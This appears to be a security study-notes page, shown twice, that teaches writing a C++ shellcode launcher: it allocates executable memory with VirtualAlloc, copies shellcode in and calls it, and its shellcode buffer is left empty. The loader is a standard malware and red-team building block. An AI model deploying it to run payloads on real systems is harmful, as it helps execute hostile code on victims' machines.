C++: Shellcode Launcher

Objective

Executing shellcode in memory.

To do list

Allocate space in memory.
Put shellcode into allocated space.
Execute the shellcode.

Functions

VirtualAlloc: Allocate space in memory for shellcode.
- Header: memoryapi.h
- Definition: LPVOID VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
  - lpAddress: Start address of allocated memory. Set 0 as default.
  - dwSize: Size of shellcode. Use sizeof function to get size of shellcode.
  - flAllocationType: Allocation type of memory. Set MEM_COMMIT as default. This guarantees that when the caller later initially accesses the memory, the contents will be zero. For further information check references.
  - flProtect: Memory privileges. Set PAGE_EXECUTE_READ_WRITE as default. This enables execute, read-only, or read/write access to the committed region of pages. For further information check references.
memcpy: Put specified bytes into specified destination.
- Header: string.h
- Definition: void *memcpy(void *restrict dest, const void *restrict src, size_t n)
  - dest: Destination address.
  - src: Source bytes (Shellcode)
  - n: Size of shellcode.

Application (launcher.cpp)

#include <string>
#include <windows.h>

int main(){

char shellcode[] = ""; //shellcode
void *memPtr= VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //yer ayir
	memcpy(memPtr, shellcode, sizeof shellcode); //bellege shellcodeu yerlestir
	((void(*)())memPtr)(); //shellcodeu aktive et
	
	}

Compile: g++ launcher.cpp -o launcher.exe

To prevent possible problems, make sure architecture of shellcode and application are same.

References

PreviousOSWE Review NextC++: Dynamic DLL Usage

Last updated 3 years ago

Was this helpful?

C++: Shellcode Launcher

Objective

Executing shellcode in memory.

To do list

Allocate space in memory.
Put shellcode into allocated space.
Execute the shellcode.

Functions

VirtualAlloc: Allocate space in memory for shellcode.
- Header: memoryapi.h
- Definition: LPVOID VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
  - lpAddress: Start address of allocated memory. Set 0 as default.
  - dwSize: Size of shellcode. Use sizeof function to get size of shellcode.
  - flAllocationType: Allocation type of memory. Set MEM_COMMIT as default. This guarantees that when the caller later initially accesses the memory, the contents will be zero. For further information check references.
  - flProtect: Memory privileges. Set PAGE_EXECUTE_READ_WRITE as default. This enables execute, read-only, or read/write access to the committed region of pages. For further information check references.
memcpy: Put specified bytes into specified destination.
- Header: string.h
- Definition: void *memcpy(void *restrict dest, const void *restrict src, size_t n)
  - dest: Destination address.
  - src: Source bytes (Shellcode)
  - n: Size of shellcode.

Application (launcher.cpp)

#include <string>
#include <windows.h>

int main(){

char shellcode[] = ""; //shellcode
void *memPtr= VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //yer ayir
	memcpy(memPtr, shellcode, sizeof shellcode); //bellege shellcodeu yerlestir
	((void(*)())memPtr)(); //shellcodeu aktive et
	
	}

Compile: g++ launcher.cpp -o launcher.exe

To prevent possible problems, make sure architecture of shellcode and application are same.

References

Microsoft, VirtualAlloc function,
Microsoft, Memory protections constants,
man7, memcpy,

PreviousOSWE Review NextC++: Dynamic DLL Usage

Last updated 3 years ago

Was this helpful?